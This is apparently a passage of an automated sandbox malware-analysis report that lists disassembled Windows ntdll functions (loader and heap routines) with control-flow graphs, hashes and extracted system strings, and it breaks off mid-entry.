                                                              • Opcode ID: 90e895160a9f4628166002351f5bb95bf2d8e9a2c9ab526baa55bf76924aaeae
                                                              • Instruction ID: b3bb32c35d72509471547f72398709e8981341148fcafefb013247d0808e9569
                                                              • Opcode Fuzzy Hash: 90e895160a9f4628166002351f5bb95bf2d8e9a2c9ab526baa55bf76924aaeae
                                                              • Instruction Fuzzy Hash: CE90023220250413D11571584508747001D47D0241FD5C497A0428518D965B8A56A126
                                                              Function 35982C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 35982c70-35982c7c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3ce8f7c3343a699a5f53d92c524abc5c34730f30c1948aa5b5c195113872cc48
                                                              • Instruction ID: b1f1ff91ae3a634845639fb522d56056a9536b5021e1dee09b38e16c81f5aa9c
                                                              • Opcode Fuzzy Hash: 3ce8f7c3343a699a5f53d92c524abc5c34730f30c1948aa5b5c195113872cc48
                                                              • Instruction Fuzzy Hash: A790023220258802D1147158840878A001947D0301F99C496A4428618D869A89957126

                                                              Non-executed Functions

                                                              Function 359FFCAB Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 96 359ffcab-359ffcc3 GetPEB 97 359ffcc5-359ffce0 GetPEB call 3593b970 96->97 98 359ffce2-359ffce3 call 3593b970 96->98 102 359ffce8-359ffd0a call 3593b970 97->102 98->102 105 359ffd0c 102->105 106 359ffd81-359ffd8a GetPEB 102->106 107 359ffd3d-359ffd42 105->107 108 359ffd7c 105->108 109 359ffd1a-359ffd1f 105->109 110 359ffd59-359ffd5e 105->110 111 359ffd36-359ffd3b 105->111 112 359ffd75-359ffd7a 105->112 113 359ffd13-359ffd18 105->113 114 359ffd52-359ffd57 105->114 115 359ffd2f-359ffd34 105->115 116 359ffd6e-359ffd73 105->116 117 359ffd4b-359ffd50 105->117 118 359ffd28-359ffd2d 105->118 119 359ffd67-359ffd6c 105->119 120 359ffd44-359ffd49 105->120 121 359ffd21-359ffd26 105->121 122 359ffd60-359ffd65 105->122 123 359ffd8c-359ffda7 GetPEB call 3593b970 106->123 124 359ffda9-359ffdaa call 3593b970 106->124 107->106 108->106 109->106 110->106 111->106 112->106 113->106 114->106 115->106 116->106 117->106 118->106 119->106 120->106 121->106 122->106 128 359ffdaf-359ffdca call 3593b970 123->128 124->128 131 359ffe0d-359ffe13 128->131 132 359ffdcc-359ffdd5 GetPEB 128->132 133 359ffe56-359ffe5c 131->133 134 359ffe15-359ffe1e GetPEB 131->134 135 359ffdd7-359ffdf2 GetPEB call 3593b970 132->135 136 359ffdf4-359ffdf5 call 3593b970 132->136 141 359ffe9f-359ffea5 133->141 142 359ffe5e-359ffe67 GetPEB 133->142 139 359ffe3d-359ffe3e call 3593b970 134->139 140 359ffe20-359ffe3b GetPEB call 3593b970 134->140 143 359ffdfa-359ffe0c call 3593b970 135->143 136->143 158 359ffe43-359ffe55 call 3593b970 139->158 140->158 145 359ffeaf-359ffeb8 GetPEB 141->145 146 359ffea7-359ffead 141->146 149 359ffe69-359ffe84 GetPEB call 3593b970 142->149 150 359ffe86-359ffe87 call 3593b970 142->150 143->131 154 359ffeba-359ffed5 GetPEB call 3593b970 145->154 155 359ffed7-359ffed8 call 3593b970 145->155 146->145 153 359ffef7-359fff00 GetPEB 146->153 163 359ffe8c-359ffe9e call 3593b970 149->163 150->163 161 359fff1f-359fff20 call 3593b970 153->161 162 359fff02-359fff1d GetPEB call 3593b970 153->162 169 359ffedd-359ffef4 call 3593b970 154->169 155->169 158->133 176 359fff25-359fff3a call 3593b970 161->176 162->176 163->141 169->153
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                              • API String ID: 0-2897834094
                                                              • Opcode ID: 2fed00379b4732c7268deee5244f9eff42f7dc5b5407b6d286fbcf89b3e85352
                                                              • Instruction ID: 49be65a6f96548d77c05899e6ab5d46bd129a138e1aac56a1a171ee2309ca7e7
                                                              • Opcode Fuzzy Hash: 2fed00379b4732c7268deee5244f9eff42f7dc5b5407b6d286fbcf89b3e85352
                                                              • Instruction Fuzzy Hash: EC61B17352B341DFD211DB58D88BD1573F9EB0473AB0B40AAE9049B252EA7AEC91CF41
                                                              Function 359E94E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 554 359e94e0-359e9529 555 359e952b-359e9530 554->555 556 359e9578-359e9587 554->556 558 359e9534-359e953a 555->558 557 359e9589-359e958e 556->557 556->558 559 359e9d13-359e9d27 call 35984c30 557->559 560 359e9695-359e96bd call 35989020 558->560 561 359e9540-359e9564 call 35989020 558->561 570 359e96bf-359e96da call 359e9d2a 560->570 571 359e96dc-359e9712 560->571 568 359e9566-359e9573 call 35a0972b 561->568 569 359e9593-359e9634 GetPEB call 359edc65 561->569 580 359e967d-359e9690 RtlDebugPrintTimes 568->580 581 359e9636-359e9644 569->581 582 359e9652-359e9667 569->582 575 359e9714-359e9716 570->575 571->575 575->559 579 359e971c-359e9731 RtlDebugPrintTimes 575->579 579->559 589 359e9737-359e973e 579->589 580->559 581->582 583 359e9646-359e964b 581->583 582->580 584 359e9669-359e966e 582->584 583->582 587 359e9673-359e9676 584->587 588 359e9670 584->588 587->580 588->587 589->559 590 359e9744-359e975f 589->590 591 359e9763-359e9774 call 359ea808 590->591 594 359e977a-359e977c 591->594 595 359e9d11 591->595 594->559 596 359e9782-359e9789 594->596 595->559 597 359e978f-359e9794 596->597 598 359e98fc-359e9902 596->598 599 359e97bc 597->599 600 359e9796-359e979c 597->600 601 359e9a9c-359e9aa2 598->601 602 359e9908-359e9937 call 35989020 598->602 606 359e97c0-359e9811 call 35989020 RtlDebugPrintTimes 599->606 600->599 605 359e979e-359e97b2 600->605 603 359e9af4-359e9af9 601->603 604 359e9aa4-359e9aad 601->604 615 359e9939-359e9944 602->615 616 359e9970-359e9985 602->616 610 359e9aff-359e9b07 603->610 611 359e9ba8-359e9bb1 603->611 604->591 609 359e9ab3-359e9aef call 35989020 604->609 612 359e97b8-359e97ba 605->612 613 359e97b4-359e97b6 605->613 606->559 648 359e9817-359e981b 606->648 633 359e9ce9 609->633 619 359e9b09-359e9b0d 610->619 620 359e9b13-359e9b3d call 359e8513 610->620 611->591 617 359e9bb7-359e9bba 611->617 612->606 613->606 622 359e994f-359e996e 615->622 623 359e9946-359e994d 615->623 627 359e9987-359e9989 616->627 628 359e9991-359e9998 616->628 624 359e9c7d-359e9cb4 call 35989020 617->624 625 359e9bc0-359e9c0a 617->625 619->611 619->620 645 359e9d08-359e9d0c 620->645 646 359e9b43-359e9b9e call 35989020 RtlDebugPrintTimes 620->646 632 359e99d9-359e99f6 RtlDebugPrintTimes 622->632 623->622 658 359e9cbb-359e9cc2 624->658 659 359e9cb6 624->659 630 359e9c0c 625->630 631 359e9c11-359e9c1e 625->631 634 359e998f 627->634 635 359e998b-359e998d 627->635 636 359e99bd-359e99bf 628->636 630->631 642 359e9c2a-359e9c2d 631->642 643 359e9c20-359e9c23 631->643 632->559 663 359e99fc-359e9a1f call 35989020 632->663 644 359e9ced 633->644 634->628 635->628 640 359e999a-359e99a4 636->640 641 359e99c1-359e99d7 636->641 655 359e99ad 640->655 656 359e99a6 640->656 641->632 653 359e9c2f-359e9c32 642->653 654 359e9c39-359e9c7b 642->654 643->642 652 359e9cf1-359e9d06 RtlDebugPrintTimes 644->652 645->591 646->559 687 359e9ba4 646->687 649 359e981d-359e9825 648->649 650 359e986b-359e9880 648->650 660 359e9827-359e9850 call 359e8513 649->660 661 359e9852-359e9869 649->661 662 359e9886-359e9894 650->662 652->559 652->645 653->654 654->652 666 359e99af-359e99b1 655->666 656->641 664 359e99a8-359e99ab 656->664 667 359e9ccd 658->667 668 359e9cc4-359e9ccb 658->668 659->658 671 359e9898-359e98ef call 35989020 RtlDebugPrintTimes 660->671 661->662 662->671 685 359e9a3d-359e9a58 663->685 686 359e9a21-359e9a3b 663->686 664->666 674 359e99bb 666->674 675 359e99b3-359e99b5 666->675 669 359e9cd1-359e9cd7 667->669 668->669 676 359e9cde-359e9ce4 669->676 677 359e9cd9-359e9cdc 669->677 671->559 690 359e98f5-359e98f7 671->690 674->636 675->674 682 359e99b7-359e99b9 675->682 676->644 683 359e9ce6 676->683 677->633 682->636 683->633 688 359e9a5d-359e9a8b RtlDebugPrintTimes 685->688 686->688 687->611 688->559 692 359e9a91-359e9a97 688->692 690->645 692->617
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $ $0
                                                              • API String ID: 3446177414-3352262554
                                                              • Opcode ID: 95b9ce9de971c987cec54e953bf733163a3901ce5804e4d87dc05ec515f997a5
                                                              • Instruction ID: c037e474d8af42a476f790dfbfa8b794d0c8f923bd921d4572e4af8e83572733
                                                              • Opcode Fuzzy Hash: 95b9ce9de971c987cec54e953bf733163a3901ce5804e4d87dc05ec515f997a5
                                                              • Instruction Fuzzy Hash: 783214B16083818FE311CF68C884B5BBBF9BB88344F04492EF9D987251D7B5E949CB52
                                                              Function 359F0274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1297 359f0274-359f0296 call 35997e54 1300 359f0298-359f02b0 RtlDebugPrintTimes 1297->1300 1301 359f02b5-359f02cd call 359376b2 1297->1301 1305 359f0751-359f0760 1300->1305 1306 359f06f7 1301->1306 1307 359f02d3-359f02e9 1301->1307 1308 359f06fa-359f074e call 359f0766 1306->1308 1309 359f02eb-359f02ee 1307->1309 1310 359f02f0-359f02f2 1307->1310 1308->1305 1311 359f02f3-359f030a 1309->1311 1310->1311 1313 359f06b1-359f06ba GetPEB 1311->1313 1314 359f0310-359f0313 1311->1314 1318 359f06bc-359f06d7 GetPEB call 3593b970 1313->1318 1319 359f06d9-359f06de call 3593b970 1313->1319 1314->1313 1316 359f0319-359f0322 1314->1316 1320 359f033e-359f0351 call 359f0cb5 1316->1320 1321 359f0324-359f033b call 3594ffb0 1316->1321 1324 359f06e3-359f06f4 call 3593b970 1318->1324 1319->1324 1332 359f035c-359f0370 call 3593758f 1320->1332 1333 359f0353-359f035a 1320->1333 1321->1320 1324->1306 1336 359f0376-359f0382 GetPEB 1332->1336 1337 359f05a2-359f05a7 1332->1337 1333->1332 1339 359f0384-359f0387 1336->1339 1340 359f03f0-359f03fb 1336->1340 1337->1308 1338 359f05ad-359f05b9 GetPEB 1337->1338 1341 359f05bb-359f05be 1338->1341 1342 359f0627-359f0632 1338->1342 1345 359f0389-359f03a4 GetPEB call 3593b970 1339->1345 1346 359f03a6-359f03ab call 3593b970 1339->1346 1343 359f04e8-359f04fa call 359527f0 1340->1343 1344 359f0401-359f0408 1340->1344 1348 359f05dd-359f05e2 call 3593b970 1341->1348 1349 359f05c0-359f05db GetPEB call 3593b970 1341->1349 1342->1308 1353 359f0638-359f0643 1342->1353 1367 359f0590-359f059d call 359f11a4 call 359f0cb5 1343->1367 1368 359f0500-359f0507 1343->1368 1344->1343 1352 359f040e-359f0417 1344->1352 1356 359f03b0-359f03d1 call 3593b970 GetPEB 1345->1356 1346->1356 1366 359f05e7-359f05fb call 3593b970 1348->1366 1349->1366 1359 359f0419-359f0429 1352->1359 1360 359f0438-359f043c 1352->1360 1353->1308 1361 359f0649-359f0654 1353->1361 1356->1343 1386 359f03d7-359f03eb 1356->1386 1359->1360 1369 359f042b-359f0435 call 359fdac6 1359->1369 1362 359f044e-359f0454 1360->1362 1363 359f043e-359f044c call 35973bc9 1360->1363 1361->1308 1370 359f065a-359f0663 GetPEB 1361->1370 1374 359f0457-359f0460 1362->1374 1363->1374 1398 359f05fe-359f0608 GetPEB 1366->1398 1367->1337 1377 359f0509-359f0510 1368->1377 1378 359f0512-359f051a 1368->1378 1369->1360 1371 359f0665-359f0680 GetPEB call 3593b970 1370->1371 1372 359f0682-359f0687 call 3593b970 1370->1372 1395 359f068c-359f06ac call 359e86ba call 3593b970 1371->1395 1372->1395 1384 359f0472-359f0475 1374->1384 1385 359f0462-359f0470 1374->1385 1377->1378 1388 359f051c-359f052c 1378->1388 1389 359f0538-359f053c 1378->1389 1396 359f0477-359f047e 1384->1396 1397 359f04e5 1384->1397 1385->1384 1386->1343 1388->1389 1399 359f052e-359f0533 call 359fdac6 1388->1399 1392 359f053e-359f0551 call 35973bc9 1389->1392 1393 359f056c-359f0572 1389->1393 1411 359f0563 1392->1411 1412 359f0553-359f0561 call 3596fe99 1392->1412 1404 359f0575-359f057c 1393->1404 1395->1398 1396->1397 1403 359f0480-359f048b 1396->1403 1397->1343 1398->1308 1405 359f060e-359f0622 1398->1405 1399->1389 1403->1397 1409 359f048d-359f0496 GetPEB 1403->1409 1404->1367 1410 359f057e-359f058e 1404->1410 1405->1308 1414 359f0498-359f04b3 GetPEB call 3593b970 1409->1414 1415 359f04b5-359f04ba call 3593b970 1409->1415 1410->1367 1417 359f0566-359f056a 1411->1417 1412->1417 1423 359f04bf-359f04dd call 359e86ba call 3593b970 1414->1423 1415->1423 1417->1404 1423->1397
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 3446177414-1700792311
                                                              • Opcode ID: 37bd86b51f34d49e8c8d4470adf117232023b59c9be797d5d70254b45a5906ce
                                                              • Instruction ID: ad8e25214708ccb477055c79c7bf1efb555982746f088176e99a026e257b7455
                                                              • Opcode Fuzzy Hash: 37bd86b51f34d49e8c8d4470adf117232023b59c9be797d5d70254b45a5906ce
                                                              • Instruction Fuzzy Hash: F2D12175618785DFDB12CF68C801AADBBFAFF49319F068049E4469B252DB36E941CF10
                                                              Function 359EF525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                              • API String ID: 3446177414-1745908468
                                                              • Opcode ID: 4a963923eac23dfeb527e78c7205beaec6a52d21be4ef9e183befaa4bb4d930c
                                                              • Instruction ID: c00563dc68d10f1314e722bfb10d76daf2a09de09b9dd02513920ea1d235d7f1
                                                              • Opcode Fuzzy Hash: 4a963923eac23dfeb527e78c7205beaec6a52d21be4ef9e183befaa4bb4d930c
                                                              • Instruction Fuzzy Hash: 7C912436A04744DFDB02CFA8C441AADBBF2FF49754F15805AE446AB262CB35E941CF50
                                                              Function 359F12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                              • API String ID: 0-3591852110
                                                              • Opcode ID: 6b39cb75c0f617b5899f851e97ec61d4aac95656400c0ec63adf4ee4ea6c85b9
                                                              • Instruction ID: 5a55afc6bcc4433606dae839e6e2537008d263fb7b6fede13aeeb47e008dde72
                                                              • Opcode Fuzzy Hash: 6b39cb75c0f617b5899f851e97ec61d4aac95656400c0ec63adf4ee4ea6c85b9
                                                              • Instruction Fuzzy Hash: 59120F74604782DFE725CF24C441BBABBF6FF09316F458459E4868B642E736E880EB90
                                                              Function 3593D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                              • API String ID: 0-3532704233
                                                              • Opcode ID: 1e335f48c35c65d65740d51bacfe2adbd03089cc97ef23f691068298771871f0
                                                              • Instruction ID: 58c413a56b5399dad116c3eb741f8c024557b68ec87668813f0ff0f6251100cb
                                                              • Opcode Fuzzy Hash: 1e335f48c35c65d65740d51bacfe2adbd03089cc97ef23f691068298771871f0
                                                              • Instruction Fuzzy Hash: 70B1ACB6609355DFD711CF24C490A9FB7E9BB88798F42092EF889D7240D774E908CB92
                                                              Function 35951070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 3446177414-3570731704
                                                              • Opcode ID: 18b492e027d1a6bc799fd7bd494e4d9b0d9bf335df725fedf17910412a220b31
                                                              • Instruction ID: 8fa0c7847e79371b9ea3a0e16abef99c4695428ae93813362583ffecb1f271ca
                                                              • Opcode Fuzzy Hash: 18b492e027d1a6bc799fd7bd494e4d9b0d9bf335df725fedf17910412a220b31
                                                              • Instruction Fuzzy Hash: 9C926A75A04368CFEB20CF18C840F99B7BABF45364F0585EAD989AB251D7749E80CF61
                                                              Function 359EFD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                              • API String ID: 3446177414-3492000579
                                                              • Opcode ID: 1a9fb27d64ce00ea93a579de4396a50aaa2695f4b0ab0077cfb1810fdbf2437c
                                                              • Instruction ID: 45bb953be50a62dae7535c02e3a52efc6cce7928f8b2ca42ebc30e1a7cbd8aed
                                                              • Opcode Fuzzy Hash: 1a9fb27d64ce00ea93a579de4396a50aaa2695f4b0ab0077cfb1810fdbf2437c
                                                              • Instruction Fuzzy Hash: 68710271A15784DFCB02CF68D440AADFBF6FF4A354F09805AE446AB252DB35E941CB50
                                                              Function 3596D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlDebugPrintTimes.NTDLL ref: 3596D959
                                                                • Part of subcall function 35944859: RtlDebugPrintTimes.NTDLL ref: 359448F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-1975516107
                                                              • Opcode ID: 902057bcf597a1b0231c7af1d65a5698785590666019965a9c29b06489457466
                                                              • Instruction ID: f8df540ab5dda50de40cb921e22bd8ad11e4426e5029eb13c53dd150371d84ea
                                                              • Opcode Fuzzy Hash: 902057bcf597a1b0231c7af1d65a5698785590666019965a9c29b06489457466
                                                              • Instruction Fuzzy Hash: D951F1B5A08345DFEB14CFA8D88478DBBB1BF4836CF164159C8117B281DB74A94ADBD0
                                                              Function 359D9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                              • API String ID: 0-3063724069
                                                              • Opcode ID: e75b1d470fdc77844c5dd6977a877b4cdbcecc7cb52347a3076fa024eedb5c01
                                                              • Instruction ID: 5492aa5c903a421b185bdd2296dc7fd9b024293608afe00285d2314bf35b4702
                                                              • Opcode Fuzzy Hash: e75b1d470fdc77844c5dd6977a877b4cdbcecc7cb52347a3076fa024eedb5c01
                                                              • Instruction Fuzzy Hash: D7D1E1B2908315AFD721EB50C840BABF7FCEF84754F818929F984A7251E774D9488B92
                                                              Function 3593D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3593D0CF
                                                              • @, xrefs: 3593D313
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3593D2C3
                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3593D146
                                                              • @, xrefs: 3593D0FD
                                                              • @, xrefs: 3593D2AF
                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 3593D196
                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3593D262
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
